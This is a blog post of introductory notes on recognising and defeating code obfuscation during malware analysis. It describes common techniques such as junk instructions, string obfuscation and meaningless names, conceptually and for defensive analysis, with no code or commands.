Reverse Engineering - Understanding Code Obfuscation
This post reflects my interest in malware analysis techniques - it should be considered a "work in progress" rather than a full blown tutorial or walkthrough, as such content may be added/removed.
What is obfuscation?
Defined as "The action of making something obscure, unclear or unintelligible". A technique is which malware authors will attempt to hide the intended functionality of their program though obfuscation techniques. Primary used to slow down your analysis of malware, such as hiding strings and functions.
Learning to defeat obfuscation: Three key areas:
1 - Identify Obfuscation - recognise the signs of obfuscation - this will help us further down the line when doing the analysis.
2- Defeat Obfuscation - knowing the steps necessary to bypass or eliminate obfuscation.
3- Deeper Analysis - By understanding how to identify and defeat obfuscation we can do a deeper dive and analysis. This will all us to identify key indicators of compromise (IOCs) or indicators of attack (IOAs). This can help us to look across the network to see if any of the IOC's exist elsewhere on other machines.
Why obfuscate?
Not all obfuscation is bad. It can be used to slow down analysis and reverse engineering efforts. Obfuscation can be done via many commercial offerings, however its important to remember that obfuscation is not 100% effective, eventually the program you wish to run needs to de-obfuscate the code in order to execute.
How does code obfuscation impact your analysis?
1- Slow down analysis and reverse engineering.
2- Hide intended functionality - strings and function calls.
3- Obtain resilience in malicious campaigns.
In Interpreted Code you should expect to find the following:
- Nonsensical variables/functions - used to throw off signature detection and make it harder to trace functions through the program.
- Unnecessary instructions - instructions that have no impact or functionality. This can be 'for' loops or 'string concatenation' in the code. It essentially does nothing and is only in place to slow you down and make the code look more complicated than it actually is.
- Sting manipulation - common technique used in interpreted code. Code needs to be de-obfuscated at some point in order to run.
In Native Code, it can me more difficult to identify code obfuscation techniques.
- Unnecessary instructions and API calls.
- Confusing logic and control flow - for example, calling an unnecessary API and then testing the result of the API using the eax register.
- Obfuscated and/or meaningless strings - again to try and throw you off the scent of what he malware is actually trying to do.
Common Obfuscation Techniques
- Adding unnecessary instructions: this can include things such as basic arithmetic, loops, defining and calling functions that aren't actually needed and object creation.
- Obfuscating strings: Strings are an important source of information for what the macros will do, hiding these strings makes it more difficult to trace functionality.
- Obfuscating objects: Identifying objects is also important and they are used to write to the underlying file system, execute commands and are used to download content from the Internet.
- Nonsensical naming: Very prevalent, use of confusing or randomly generated names also makes it more difficult to trace functionality and the flow of the program.
Prior to undertaking any analysis, an effective approach is required - you need to have an analysis objective before starting. This should be your primary goal and consideration so that you don't go down the rabbit hole.
Photo by National Cancer Institute on Unsplash